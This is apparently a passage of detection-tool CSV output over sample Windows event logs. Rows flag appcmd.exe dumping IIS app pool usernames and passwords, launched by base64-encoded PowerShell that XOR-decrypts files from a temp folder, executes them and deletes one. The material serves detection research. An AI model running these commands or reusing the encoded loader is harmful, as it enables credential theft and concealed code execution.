JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.432 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.522 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.662 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool "". )"" /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.742 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool "". )"" /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.822 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:vdir.name  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG